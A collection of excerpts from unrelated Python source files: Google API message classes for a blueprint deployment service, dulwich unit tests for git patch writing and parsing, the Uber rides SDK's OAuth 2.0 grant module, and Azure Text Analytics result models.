labels = _messages.MessageField('LabelsValue', 8)
latestRevision = _messages.StringField(9)
name = _messages.StringField(10)
reconcileTimeout = _messages.StringField(11)
state = _messages.EnumField('StateValueValuesEnum', 12)
stateDetail = _messages.StringField(13)
updateTime = _messages.StringField(14)
class DeploymentOperationMetadata(_messages.Message):
r"""Ephemeral metadata content describing the state of a deployment
operation.
Enums:
StepValueValuesEnum: The current step the deployment operation is running.
Fields:
applyResults: Locations of outputs from config application.
pipelineResults: Locations of outputs from kpt pipeline execution.
step: The current step the deployment operation is running.
"""
class StepValueValuesEnum(_messages.Enum):
r"""The current step the deployment operation is running.
Values:
DEPLOYMENT_STEP_UNSPECIFIED: No deployment step was specified.
PREPARING_STORAGE_BUCKET: Checking for existence of a storage bucket and
creating one in it's absence. This can take up to 7 minutes on the
first deployment.
PREPARING_CONFIG_CONTROLLER: Checking for existence of a Config
Controller instance and creating one in it's absence. This can take up
to 20 minutes on the first deployment.
CREATING_REVISION: Creating a revision resource.
RUNNING_PIPELINE: Blueprint is being processed.
RUNNING_APPLY: Blueprint is being applied to Config Controller.
RUNNING_PREVIEW: Blueprint is being previewed with Config Controller.
"""
DEPLOYMENT_STEP_UNSPECIFIED = 0
PREPARING_STORAGE_BUCKET = 1
PREPARING_CONFIG_CONTROLLER = 2
CREATING_REVISION = 3
RUNNING_PIPELINE = 4
RUNNING_APPLY = 5
RUNNING_PREVIEW = 6
applyResults = _messages.MessageField('ApplyResults', 1)
pipelineResults = _messages.MessageField('PipelineResults', 2)
step = _messages.EnumField('StepValueValuesEnum', 3)
class Empty(_messages.Message):
r"""A generic empty message that you can re-use to avoid defining duplicated
empty messages in your APIs. A typical example is to use it as the request
or the response type of an API method. For instance: service Foo { rpc
Bar(google.protobuf.Empty) returns (google.protobuf.Empty); } The JSON
representation for `Empty` is empty JSON object `{}`.
"""
class Expr(_messages.Message):
r"""Represents a textual expression in the Common Expression Language (CEL)
syntax. CEL is a C-like expression language. The syntax and semantics of CEL
are documented at https://github.com/google/cel-spec. Example (Comparison):
title: "Summary size limit" description: "Determines if a summary is less
than 100 chars" expression: "document.summary.size() < 100" Example
(Equality): title: "Requestor is owner" description: "Determines if
requestor is the document owner" expression: "document.owner ==
request.auth.claims.email" Example (Logic): title: "Public documents"
description: "Determine whether the document should be publicly visible"
expression: "document.type != 'private' && document.type != 'internal'"
Example (Data Manipulation): title: "Notification string" description:
"Create a notification string with a timestamp." expression: "'New message
received at ' + string(document.create_time)" The exact variables and
functions that may be referenced within an expression are determined by the
service that evaluates it. See the service documentation for additional
information.
Fields:
description: Optional. Description of the expression. This is a longer
text which describes the expression, e.g. when hovered over it in a UI.
expression: Textual representation of an expression in Common Expression
Language syntax.
location: Optional. String indicating the location of the expression for
error reporting, e.g. a file name and a position in the file.
title: Optional. Title for the expression, i.e. a short string describing
its purpose. This can be used e.g. in UIs which allow to enter the
expression.
"""
description = _messages.StringField(1)
expression = _messages.StringField(2)
location = _messages.StringField(3)
title = _messages.StringField(4)
class Function(_messages.Message):
r"""A function that can be run to modify blueprint contents.
Messages:
ConfigValue: Optional. KRM resource passed to the function as input. The
entire resource must be no larger than 1024 bytes.
InlineConfigValue: Optional. KRM resource passed to the function as
inlined input. The entire resource must be no larger than 1024 bytes.
Fields:
config: Optional. KRM resource passed to the function as input. The entire
resource must be no larger than 1024 bytes.
gcsConfig: Optional. A Cloud Storage link referencing a KRM yaml file to
use as input to the function. There are no size limitations on this
field. Format: gs://my-bucket/my-directory/my-function-config.yaml
image: Required. Container image to run. Example: `gcr.io/kpt-fn/set-
label`
inlineConfig: Optional. KRM resource passed to the function as inlined
input. The entire resource must be no larger than 1024 bytes.
"""
@encoding.MapUnrecognizedFields('additionalProperties')
class ConfigValue(_messages.Message):
r"""Optional. KRM resource passed to the function as input. The entire
resource must be no larger than 1024 bytes.
Messages:
AdditionalProperty: An additional property for a ConfigValue object.
Fields:
additionalProperties: Properties of the object.
"""
class AdditionalProperty(_messages.Message):
r"""An additional property for a ConfigValue object.
Fields:
key: Name of the additional property.
value: A extra_types.JsonValue attribute.
"""
key = _messages.StringField(1)
value = _messages.MessageField('extra_types.JsonValue', 2)
additionalProperties = | |
# test_patch.py -- tests for patch.py
# Copyright (C) 2010 <NAME> <<EMAIL>>
#
# Dulwich is dual-licensed under the Apache License, Version 2.0 and the GNU
# General Public License as public by the Free Software Foundation; version 2.0
# or (at your option) any later version. You can redistribute it and/or
# modify it under the terms of either of these two licenses.
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# You should have received a copy of the licenses; if not, see
# <http://www.gnu.org/licenses/> for a copy of the GNU General Public License
# and <http://www.apache.org/licenses/LICENSE-2.0> for a copy of the Apache
# License, Version 2.0.
#
"""Tests for patch.py."""
from io import BytesIO, StringIO
from dulwich.objects import (
Blob,
Commit,
S_IFGITLINK,
Tree,
)
from dulwich.object_store import (
MemoryObjectStore,
)
from dulwich.patch import (
get_summary,
git_am_patch_split,
write_blob_diff,
write_commit_patch,
write_object_diff,
write_tree_diff,
)
from dulwich.tests import (
SkipTest,
TestCase,
)
class WriteCommitPatchTests(TestCase):
def test_simple_bytesio(self):
f = BytesIO()
c = Commit()
c.committer = c.author = b"Jelmer <<EMAIL>>"
c.commit_time = c.author_time = 1271350201
c.commit_timezone = c.author_timezone = 0
c.message = b"This is the first line\nAnd this is the second line.\n"
c.tree = Tree().id
write_commit_patch(f, c, b"CONTENTS", (1, 1), version="custom")
f.seek(0)
lines = f.readlines()
self.assertTrue(
lines[0].startswith(b"From 0b0d34d1b5b596c928adc9a727a4b9e03d025298")
)
self.assertEqual(lines[1], b"From: Jelmer <<EMAIL>>\n")
self.assertTrue(lines[2].startswith(b"Date: "))
self.assertEqual(
[
b"Subject: [PATCH 1/1] This is the first line\n",
b"And this is the second line.\n",
b"\n",
b"\n",
b"---\n",
],
lines[3:8],
)
self.assertEqual([b"CONTENTS-- \n", b"custom\n"], lines[-2:])
if len(lines) >= 12:
# diffstat may not be present
self.assertEqual(lines[8], b" 0 files changed\n")
class ReadGitAmPatch(TestCase):
def test_extract_string(self):
text = b"""\
From ff643aae102d8870cac88e8f007e70f58f3a7363 Mon Sep 17 00:00:00 2001
From: <NAME> <<EMAIL>>
Date: Thu, 15 Apr 2010 15:40:28 +0200
Subject: [PATCH 1/2] Remove executable bit from prey.ico (triggers a warning).
---
pixmaps/prey.ico | Bin 9662 -> 9662 bytes
1 files changed, 0 insertions(+), 0 deletions(-)
mode change 100755 => 100644 pixmaps/prey.ico
--
1.7.0.4
"""
c, diff, version = git_am_patch_split(StringIO(text.decode("utf-8")), "utf-8")
self.assertEqual(b"<NAME> <<EMAIL>>", c.committer)
self.assertEqual(b"<NAME> <<EMAIL>>", c.author)
self.assertEqual(
b"Remove executable bit from prey.ico " b"(triggers a warning).\n",
c.message,
)
self.assertEqual(
b""" pixmaps/prey.ico | Bin 9662 -> 9662 bytes
1 files changed, 0 insertions(+), 0 deletions(-)
mode change 100755 => 100644 pixmaps/prey.ico
""",
diff,
)
self.assertEqual(b"1.7.0.4", version)
def test_extract_bytes(self):
text = b"""\
From ff643aae102d8870cac88e8f007e70f58f3a7363 Mon Sep 17 00:00:00 2001
From: <NAME> <<EMAIL>>
Date: Thu, 15 Apr 2010 15:40:28 +0200
Subject: [PATCH 1/2] Remove executable bit from prey.ico (triggers a warning).
---
pixmaps/prey.ico | Bin 9662 -> 9662 bytes
1 files changed, 0 insertions(+), 0 deletions(-)
mode change 100755 => 100644 pixmaps/prey.ico
--
1.7.0.4
"""
c, diff, version = git_am_patch_split(BytesIO(text))
self.assertEqual(b"<NAME> <<EMAIL>>", c.committer)
self.assertEqual(b"<NAME> <<EMAIL>>", c.author)
self.assertEqual(
b"Remove executable bit from prey.ico " b"(triggers a warning).\n",
c.message,
)
self.assertEqual(
b""" pixmaps/prey.ico | Bin 9662 -> 9662 bytes
1 files changed, 0 insertions(+), 0 deletions(-)
mode change 100755 => 100644 pixmaps/prey.ico
""",
diff,
)
self.assertEqual(b"1.7.0.4", version)
def test_extract_spaces(self):
text = b"""From ff643aae102d8870cac88e8f007e70f58f3a7363 Mon Sep 17 00:00:00 2001
From: <NAME> <<EMAIL>>
Date: Thu, 15 Apr 2010 15:40:28 +0200
Subject: [Dulwich-users] [PATCH] Added unit tests for
dulwich.object_store.tree_lookup_path.
* dulwich/tests/test_object_store.py
(TreeLookupPathTests): This test case contains a few tests that ensure the
tree_lookup_path function works as expected.
---
pixmaps/prey.ico | Bin 9662 -> 9662 bytes
1 files changed, 0 insertions(+), 0 deletions(-)
mode change 100755 => 100644 pixmaps/prey.ico
--
1.7.0.4
"""
c, diff, version = git_am_patch_split(BytesIO(text), "utf-8")
self.assertEqual(
b"""\
Added unit tests for dulwich.object_store.tree_lookup_path.
* dulwich/tests/test_object_store.py
(TreeLookupPathTests): This test case contains a few tests that ensure the
tree_lookup_path function works as expected.
""",
c.message,
)
def test_extract_pseudo_from_header(self):
text = b"""From ff643aae102d8870cac88e8f007e70f58f3a7363 Mon Sep 17 00:00:00 2001
From: <NAME> <<EMAIL>>
Date: Thu, 15 Apr 2010 15:40:28 +0200
Subject: [Dulwich-users] [PATCH] Added unit tests for
dulwich.object_store.tree_lookup_path.
From: <NAME> <<EMAIL>>
* dulwich/tests/test_object_store.py
(TreeLookupPathTests): This test case contains a few tests that ensure the
tree_lookup_path function works as expected.
---
pixmaps/prey.ico | Bin 9662 -> 9662 bytes
1 files changed, 0 insertions(+), 0 deletions(-)
mode change 100755 => 100644 pixmaps/prey.ico
--
1.7.0.4
"""
c, diff, version = git_am_patch_split(BytesIO(text), "utf-8")
self.assertEqual(b"<NAME> <<EMAIL>>", c.author)
self.assertEqual(
b"""\
Added unit tests for dulwich.object_store.tree_lookup_path.
* dulwich/tests/test_object_store.py
(TreeLookupPathTests): This test case contains a few tests that ensure the
tree_lookup_path function works as expected.
""",
c.message,
)
def test_extract_no_version_tail(self):
text = b"""\
From ff643aae102d8870cac88e8f007e70f58f3a7363 Mon Sep 17 00:00:00 2001
From: <NAME> <<EMAIL>>
Date: Thu, 15 Apr 2010 15:40:28 +0200
Subject: [Dulwich-users] [PATCH] Added unit tests for
dulwich.object_store.tree_lookup_path.
From: <NAME> <<EMAIL>>
---
pixmaps/prey.ico | Bin 9662 -> 9662 bytes
1 files changed, 0 insertions(+), 0 deletions(-)
mode change 100755 => 100644 pixmaps/prey.ico
"""
c, diff, version = git_am_patch_split(BytesIO(text), "utf-8")
self.assertEqual(None, version)
def test_extract_mercurial(self):
raise SkipTest(
"git_am_patch_split doesn't handle Mercurial patches " "properly yet"
)
expected_diff = """\
diff --git a/dulwich/tests/test_patch.py b/dulwich/tests/test_patch.py
--- a/dulwich/tests/test_patch.py
+++ b/dulwich/tests/test_patch.py
@@ -158,7 +158,7 @@
'''
c, diff, version = git_am_patch_split(BytesIO(text))
- self.assertIs(None, version)
+ self.assertEqual(None, version)
class DiffTests(TestCase):
"""
text = (
"""\
From dulwich-users-bounces+<EMAIL>mer=sam<EMAIL>@lists.launchpad.net \
Mon Nov 29 00:58:18 2010
Date: Sun, 28 Nov 2010 17:57:27 -0600
From: <NAME> <<EMAIL>>
To: dulwich-users <<EMAIL>>
Subject: [Dulwich-users] [PATCH] test_patch: fix tests on Python 2.6
Content-Transfer-Encoding: 8bit
Change-Id: I5e51313d4ae3a65c3f00c665002a7489121bb0d6
%s
_______________________________________________
Mailing list: https://launchpad.net/~dulwich-users
Post to : <EMAIL>
Unsubscribe : https://launchpad.net/~dulwich-users
More help : https://help.launchpad.net/ListHelp
"""
% expected_diff
)
c, diff, version = git_am_patch_split(BytesIO(text))
self.assertEqual(expected_diff, diff)
self.assertEqual(None, version)
class DiffTests(TestCase):
"""Tests for write_blob_diff and write_tree_diff."""
def test_blob_diff(self):
f = BytesIO()
write_blob_diff(
f,
(b"foo.txt", 0o644, Blob.from_string(b"old\nsame\n")),
(b"bar.txt", 0o644, Blob.from_string(b"new\nsame\n")),
)
self.assertEqual(
[
b"diff --git a/foo.txt b/bar.txt",
b"index 3b0f961..a116b51 644",
b"--- a/foo.txt",
b"+++ b/bar.txt",
b"@@ -1,2 +1,2 @@",
b"-old",
b"+new",
b" same",
],
f.getvalue().splitlines(),
)
def test_blob_add(self):
f = BytesIO()
write_blob_diff(
f,
(None, None, None),
(b"bar.txt", 0o644, Blob.from_string(b"new\nsame\n")),
)
self.assertEqual(
[
b"diff --git a/bar.txt b/bar.txt",
b"new file mode 644",
b"index 0000000..a116b51",
b"--- /dev/null",
b"+++ b/bar.txt",
b"@@ -0,0 +1,2 @@",
b"+new",
b"+same",
],
f.getvalue().splitlines(),
)
def test_blob_remove(self):
f = BytesIO()
write_blob_diff(
f,
(b"bar.txt", 0o644, Blob.from_string(b"new\nsame\n")),
(None, None, None),
)
self.assertEqual(
[
b"diff --git a/bar.txt b/bar.txt",
b"deleted file mode 644",
b"index a116b51..0000000",
b"--- a/bar.txt",
b"+++ /dev/null",
b"@@ -1,2 +0,0 @@",
b"-new",
b"-same",
],
f.getvalue().splitlines(),
)
def test_tree_diff(self):
f = BytesIO()
store = MemoryObjectStore()
added = Blob.from_string(b"add\n")
removed = Blob.from_string(b"removed\n")
changed1 = Blob.from_string(b"unchanged\nremoved\n")
changed2 = Blob.from_string(b"unchanged\nadded\n")
unchanged = Blob.from_string(b"unchanged\n")
tree1 = Tree()
tree1.add(b"removed.txt", 0o644, removed.id)
tree1.add(b"changed.txt", 0o644, changed1.id)
tree1.add(b"unchanged.txt", 0o644, changed1.id)
tree2 = Tree()
tree2.add(b"added.txt", 0o644, added.id)
tree2.add(b"changed.txt", 0o644, changed2.id)
tree2.add(b"unchanged.txt", 0o644, changed1.id)
store.add_objects(
[
(o, None)
for o in [
tree1,
tree2,
added,
removed,
changed1,
changed2,
unchanged,
]
]
)
write_tree_diff(f, store, tree1.id, tree2.id)
self.assertEqual(
[
b"diff --git a/added.txt b/added.txt",
b"new file mode 644",
b"index 0000000..76d4bb8",
b"--- /dev/null",
b"+++ b/added.txt",
b"@@ -0,0 +1 @@",
b"+add",
b"diff --git a/changed.txt b/changed.txt",
b"index bf84e48..1be2436 644",
b"--- a/changed.txt",
b"+++ b/changed.txt",
b"@@ -1,2 +1,2 @@",
b" unchanged",
b"-removed",
b"+added",
b"diff --git a/removed.txt b/removed.txt",
b"deleted file mode 644",
b"index 2c3f0b3..0000000",
b"--- a/removed.txt",
b"+++ /dev/null",
b"@@ -1 +0,0 @@",
b"-removed",
],
f.getvalue().splitlines(),
)
def test_tree_diff_submodule(self):
f = BytesIO()
store = MemoryObjectStore()
tree1 = Tree()
tree1.add(
b"asubmodule",
S_IFGITLINK,
b"06d0bdd9e2e20377b3180e4986b14c8549b393e4",
)
tree2 = Tree()
tree2.add(
b"asubmodule",
S_IFGITLINK,
b"cc975646af69f279396d4d5e1379ac6af80ee637",
)
store.add_objects([(o, None) for o in [tree1, tree2]])
write_tree_diff(f, store, tree1.id, tree2.id)
self.assertEqual(
[
b"diff --git a/asubmodule b/asubmodule",
b"index 06d0bdd..cc97564 160000",
b"--- a/asubmodule",
b"+++ b/asubmodule",
b"@@ -1 +1 @@",
b"-Subproject commit <PASSWORD>",
b"+Subproject commit <PASSWORD>",
],
f.getvalue().splitlines(),
)
def test_object_diff_blob(self):
f = BytesIO()
b1 = Blob.from_string(b"old\nsame\n")
b2 = Blob.from_string(b"new\nsame\n")
store = MemoryObjectStore()
store.add_objects([(b1, None), (b2, None)])
write_object_diff(
f, store, (b"foo.txt", 0o644, b1.id), (b"bar.txt", 0o644, b2.id)
)
self.assertEqual(
[
b"diff --git a/foo.txt b/bar.txt",
b"index 3b0f961..a116b51 644",
b"--- a/foo.txt",
b"+++ b/bar.txt",
b"@@ -1,2 +1,2 @@",
b"-old",
b"+new",
b" same",
],
f.getvalue().splitlines(),
)
def test_object_diff_add_blob(self):
f = BytesIO()
store = MemoryObjectStore()
b2 = Blob.from_string(b"new\nsame\n")
store.add_object(b2)
write_object_diff(f, store, (None, None, None), (b"bar.txt", 0o644, b2.id))
self.assertEqual(
[
b"diff --git a/bar.txt b/bar.txt",
b"new file mode 644",
b"index 0000000..a116b51",
b"--- /dev/null",
b"+++ b/bar.txt",
b"@@ -0,0 +1,2 @@",
b"+new",
b"+same",
],
f.getvalue().splitlines(),
)
def test_object_diff_remove_blob(self):
f = BytesIO()
b1 = Blob.from_string(b"new\nsame\n")
store = MemoryObjectStore()
store.add_object(b1)
write_object_diff(f, store, (b"bar.txt", 0o644, b1.id), (None, None, None))
self.assertEqual(
[
b"diff --git a/bar.txt b/bar.txt",
b"deleted file mode 644",
b"index a116b51..0000000",
b"--- a/bar.txt",
b"+++ /dev/null",
b"@@ -1,2 +0,0 @@",
b"-new",
b"-same",
],
f.getvalue().splitlines(),
)
def test_object_diff_bin_blob_force(self):
f = BytesIO()
# Prepare two slightly different PNG headers
| |
# Copyright (c) 2016 Uber Technologies, Inc.
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
# THE SOFTWARE.
"""An internal module to handle OAuth 2.0 Authorization.
There are three ways you may obtain an access token:
- Authorization Code Grant
- Implicit Grant
- Client Credentials Grant
Each OAuth 2.0 grant uses your app credentials to start an
authorization process with Uber. Upon successful authorization,
a Session is created, which stores the OAuth 2.0 credentials.
"""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from __future__ import unicode_literals
from collections import OrderedDict
from random import SystemRandom
from requests import codes
from requests import post
from string import ascii_letters
from string import digits
try:
from urllib.parse import parse_qs
from urllib.parse import urlparse
except ImportError:
from urlparse import parse_qs
from urlparse import urlparse
from uber_rides.errors import ClientError
from uber_rides.errors import UberIllegalState
from uber_rides.session import OAuth2Credential
from uber_rides.session import Session
from uber_rides.utils import auth
from uber_rides.utils.request import build_url
class OAuth2(object):
"""The parent class for all OAuth 2.0 grant types."""
def __init__(self, client_id, scopes):
"""Initialize OAuth 2.0 Class.
Parameters
client_id (str)
Your app's Client ID.
scopes (set)
Set of permission scopes to request.
(e.g. {'profile', 'history'}) Keep this list minimal so
users feel safe granting your app access to their information.
"""
self.client_id = client_id
self.scopes = scopes
def _build_authorization_request_url(
self,
response_type,
redirect_url,
state=None
):
"""Form URL to request an auth code or access token.
Parameters
response_type (str)
Either 'code' (Authorization Code Grant) or
'token' (Implicit Grant)
redirect_url (str)
The URL that the Uber server will redirect the user to after
finishing authorization. The redirect must be HTTPS-based and
match the URL you registered your application with. Localhost
URLs are permitted and can be either HTTP or HTTPS.
state (str)
Optional CSRF State token to send to server.
Returns
(str)
The fully constructed authorization request URL.
Raises
UberIllegalState (ApiError)
Raised if response_type parameter is invalid.
"""
if response_type not in auth.VALID_RESPONSE_TYPES:
message = '{} is not a valid response type.'
raise UberIllegalState(message.format(response_type))
args = OrderedDict([
('scope', ' '.join(self.scopes)),
('state', state),
('redirect_uri', redirect_url),
('response_type', response_type),
('client_id', self.client_id),
])
return build_url(auth.AUTH_HOST, auth.AUTHORIZE_PATH, args)
def _extract_query(self, redirect_url):
"""Extract query parameters from a url.
Parameters
redirect_url (str)
The full URL that the Uber server redirected to after
the user authorized your app.
Returns
(dict)
A dictionary of query parameters.
"""
qs = urlparse(redirect_url)
# Implicit Grant redirect_urls have data after fragment identifier (#)
# All other redirect_urls return data after query identifier (?)
qs = qs.fragment if isinstance(self, ImplicitGrant) else qs.query
query_params = parse_qs(qs)
query_params = {qp: query_params[qp][0] for qp in query_params}
return query_params
class AuthorizationCodeGrant(OAuth2):
"""Class for Authorization Code Grant type.
The authorization code grant type is used to obtain both access
tokens and refresh tokens and is optimized for confidential clients.
It involves a two-step authorization process. The first step is having
the user authorize your app. The second involves getting an OAuth 2.0
access token from Uber.
"""
def __init__(
self,
client_id,
scopes,
client_secret,
redirect_url,
state_token=None,
):
"""Initialize AuthorizationCodeGrant Class.
Parameters
client_id (str)
Your app's Client ID.
scopes (set)
Set of permission scopes to request.
(e.g. {'profile', 'history'}) Keep this list minimal so
users feel safe granting your app access to their information.
client_secret (str)
Your app's Client Secret.
redirect_url (str)
The URL that the Uber server will redirect the user to after
finishing authorization. The redirect must be HTTPS-based and
match the URL you registered your application with. Localhost
URLs are permitted and can be either HTTP or HTTPS.
state_token (str)
The CSRF State Token used to create an authorization.
"""
super(AuthorizationCodeGrant, self).__init__(client_id, scopes)
self.redirect_url = redirect_url
self.client_secret = client_secret
if state_token is not None:
self.state_token = state_token
else:
self.state_token = self._generate_state_token()
def _generate_state_token(self, length=32):
"""Generate CSRF State Token.
CSRF State Tokens are passed as a parameter in the authorization
URL and are checked when receiving responses from the Uber Auth
server to prevent request forgery.
"""
choices = ascii_letters + digits
return ''.join(SystemRandom().choice(choices) for _ in range(length))
def get_authorization_url(self):
"""Start the Authorization Code Grant process.
This function starts the OAuth 2.0 authorization process and builds an
authorization URL. You should redirect your user to this URL, where
they can grant your application access to their Uber account.
Returns
(str)
The fully constructed authorization request URL.
Tell the user to visit this URL and approve your app.
"""
return self._build_authorization_request_url(
response_type=auth.CODE_RESPONSE_TYPE,
redirect_url=self.redirect_url,
state=self.state_token,
)
def _verify_query(self, query_params):
"""Verify response from the Uber Auth server.
Parameters
query_params (dict)
Dictionary of query parameters attached to your redirect URL
after user approved your app and was redirected.
Returns
authorization_code (str)
Code received when user grants your app access. Use this code
to request an access token.
Raises
UberIllegalState (ApiError)
Thrown if the redirect URL was missing parameters or if the
given parameters were not valid.
"""
error_message = None
# Check CSRF State Token against returned state token from GET request
received_state_token = query_params.get('state')
if received_state_token is None:
error_message = 'Bad Request. Missing state parameter.'
raise UberIllegalState(error_message)
if self.state_token is None:
error_message = 'Missing CSRF State Token in session.'
raise UberIllegalState(error_message)
if self.state_token != received_state_token:
error_message = 'CSRF Error. Expected {}, got {}'
error_message = error_message.format(
self.state_token,
received_state_token,
)
raise UberIllegalState(error_message)
# Verify either 'code' or 'error' parameter exists
error = query_params.get('error')
authorization_code = query_params.get(auth.CODE_RESPONSE_TYPE)
if error and authorization_code:
error_message = (
'Code and Error query params code and error '
'can not both be set.'
)
raise UberIllegalState(error_message)
if error is None and authorization_code is None:
error_message = 'Neither query parameter code or error is set.'
raise UberIllegalState(error_message)
if error:
raise UberIllegalState(error)
return authorization_code
def get_session(self, redirect_url):
"""Complete the Authorization Code Grant process.
The redirect URL received after the user has authorized
your application contains an authorization code. Use this
authorization code to request an access token.
Parameters
redirect_url (str)
The full URL that the Uber server redirected to after
the user authorized your app.
Returns
(Session)
A Session object with OAuth 2.0 credentials.
"""
query_params = self._extract_query(redirect_url)
authorization_code = self._verify_query(query_params)
response = _request_access_token(
grant_type=auth.AUTHORIZATION_CODE_GRANT,
client_id=self.client_id,
client_secret=self.client_secret,
code=authorization_code,
redirect_url=self.redirect_url,
)
oauth2credential = OAuth2Credential.make_from_response(
response=response,
grant_type=auth.AUTHORIZATION_CODE_GRANT,
client_id=self.client_id,
client_secret=self.client_secret,
redirect_url=self.redirect_url,
)
return Session(oauth2credential=oauth2credential)
class ImplicitGrant(OAuth2):
"""Class for Implicit Grant type.
The implicit grant type is used to obtain access tokens and is optimized
for public clients under a particular redirect URI. It does not
refresh access tokens.
Unlike the authorization code grant type, in which the client makes
separate requests for authorization and access token, the client
receives the access token as the result of the authorization request.
"""
def __init__(self, client_id, scopes, redirect_url):
"""Initialize ImplicitGrant Class.
Parameters
client_id (str)
Your app's Client ID.
scopes (set)
Set of permission scopes to request.
(e.g. {'profile', 'history'}) Keep this list minimal so
users feel safe granting your app access to their information.
redirect_url (str)
The URL that the Uber server will redirect the user to after
finishing authorization. The redirect must be HTTPS-based and
match the URL you registered your application with. Localhost
URLs are permitted and can be either HTTP or | |
document.
:type id: str
:param entities: Recognized well-known entities in the document.
:type entities:
list[~azure.ai.textanalytics.LinkedEntity]
:param statistics: If show_stats=true was specified in the request this
field will contain information about the document payload.
:type statistics:
~azure.ai.textanalytics.TextDocumentStatistics
:param bool is_error: Boolean check for error item when iterating over list of
results. Always False for an instance of a RecognizeLinkedEntitiesResult.
"""
def __init__(self, **kwargs):
self.id = kwargs.get("id", None)
self.entities = kwargs.get("entities", None)
self.statistics = kwargs.get("statistics", None)
self.is_error = False
def __repr__(self):
return "RecognizeLinkedEntitiesResult(id={}, entities={}, statistics={}, is_error={})" \
.format(self.id, repr(self.entities), repr(self.statistics), self.is_error)[:1024]
class AnalyzeSentimentResult(DictMixin):
"""AnalyzeSentimentResult is a result object which contains
the overall predicted sentiment and confidence scores for your document
and a per-sentence sentiment prediction with scores.
:param id: Unique, non-empty document identifier that matches the
document id that was passed in with the request. If not specified
in the request, an id is assigned for the document.
:type id: str
:param sentiment: Predicted sentiment for document (Negative,
Neutral, Positive, or Mixed). Possible values include: 'positive',
'neutral', 'negative', 'mixed'
:type sentiment: str
:param statistics: If show_stats=true was specified in the request this
field will contain information about the document payload.
:type statistics:
~azure.ai.textanalytics.TextDocumentStatistics
:param confidence_scores: Document level sentiment confidence
scores between 0 and 1 for each sentiment label.
:type confidence_scores:
~azure.ai.textanalytics.SentimentConfidenceScores
:param sentences: Sentence level sentiment analysis.
:type sentences:
list[~azure.ai.textanalytics.SentenceSentiment]
:param bool is_error: Boolean check for error item when iterating over list of
results. Always False for an instance of a AnalyzeSentimentResult.
"""
def __init__(self, **kwargs):
self.id = kwargs.get("id", None)
self.sentiment = kwargs.get("sentiment", None)
self.statistics = kwargs.get("statistics", None)
self.confidence_scores = kwargs.get("confidence_scores", None)
self.sentences = kwargs.get("sentences", None)
self.is_error = False
def __repr__(self):
return "AnalyzeSentimentResult(id={}, sentiment={}, statistics={}, confidence_scores={}, sentences={}, " \
"is_error={})".format(self.id, self.sentiment, repr(self.statistics), repr(self.confidence_scores),
repr(self.sentences), self.is_error)[:1024]
class TextDocumentStatistics(DictMixin):
"""TextDocumentStatistics contains information about
the document payload.
:param grapheme_count: Number of text elements recognized in
the document.
:type grapheme_count: int
:param transaction_count: Number of transactions for the
document.
:type transaction_count: int
"""
def __init__(self, **kwargs):
self.grapheme_count = kwargs.get("grapheme_count", None)
self.transaction_count = kwargs.get("transaction_count", None)
@classmethod
def _from_generated(cls, stats):
if stats is None:
return None
return cls(
grapheme_count=stats.characters_count,
transaction_count=stats.transactions_count,
)
def __repr__(self):
return "TextDocumentStatistics(grapheme_count={}, transaction_count={})" \
.format(self.grapheme_count, self.transaction_count)[:1024]
class DocumentError(DictMixin):
"""DocumentError is an error object which represents an error on
the individual document.
:param id: Unique, non-empty document identifier that matches the
document id that was passed in with the request. If not specified
in the request, an id is assigned for the document.
:type id: str
:param error: The document error.
:type error: ~azure.ai.textanalytics.TextAnalyticsError
:param bool is_error: Boolean check for error item when iterating over list of
results. Always True for an instance of a DocumentError.
"""
def __init__(self, **kwargs):
self.id = kwargs.get("id", None)
self.error = kwargs.get("error", None)
self.is_error = True
def __getattr__(self, attr):
result_set = set()
result_set.update(
RecognizeEntitiesResult().keys() + RecognizePiiEntitiesResult().keys()
+ DetectLanguageResult().keys() + RecognizeLinkedEntitiesResult().keys()
+ AnalyzeSentimentResult().keys() + ExtractKeyPhrasesResult().keys()
)
result_attrs = result_set.difference(DocumentError().keys())
if attr in result_attrs:
raise AttributeError(
"'DocumentError' object has no attribute '{}'. The service was unable to process this document:\n"
"Document Id: {}\nError: {} - {}\n".
format(attr, self.id, self.error.code, self.error.message)
)
raise AttributeError("'DocumentError' object has no attribute '{}'".format(attr))
@classmethod
def _from_generated(cls, doc_err):
return cls(
id=doc_err.id,
error=TextAnalyticsError._from_generated(doc_err.error), # pylint: disable=protected-access
is_error=True
)
def __repr__(self):
return "DocumentError(id={}, error={}, is_error={})" \
.format(self.id, repr(self.error), self.is_error)[:1024]
class DetectLanguageInput(LanguageInput):
"""The input document to be analyzed for detecting language.
:param id: Required. Unique, non-empty document identifier.
:type id: str
:param text: Required. The input text to process.
:type text: str
:param country_hint: A country hint to help better detect
the language of the text. Accepts two letter country codes
specified by ISO 3166-1 alpha-2. Defaults to "US". Pass
in the string "none" to not use a country_hint.
:type country_hint: str
"""
def __init__(self, **kwargs):
super(DetectLanguageInput, self).__init__(**kwargs)
self.id = kwargs.get("id", None)
self.text = kwargs.get("text", None)
self.country_hint = kwargs.get("country_hint", None)
def __repr__(self):
return "DetectLanguageInput(id={}, text={}, country_hint={})" \
.format(self.id, self.text, self.country_hint)[:1024]
class LinkedEntity(DictMixin):
"""LinkedEntity contains a link to the well-known recognized
entity in text. The link comes from a data source like Wikipedia
or Bing. It additionally includes all of the matches of this
entity found in the document.
:param name: Entity Linking formal name.
:type name: str
:param matches: List of instances this entity appears in the text.
:type matches:
list[~azure.ai.textanalytics.LinkedEntityMatch]
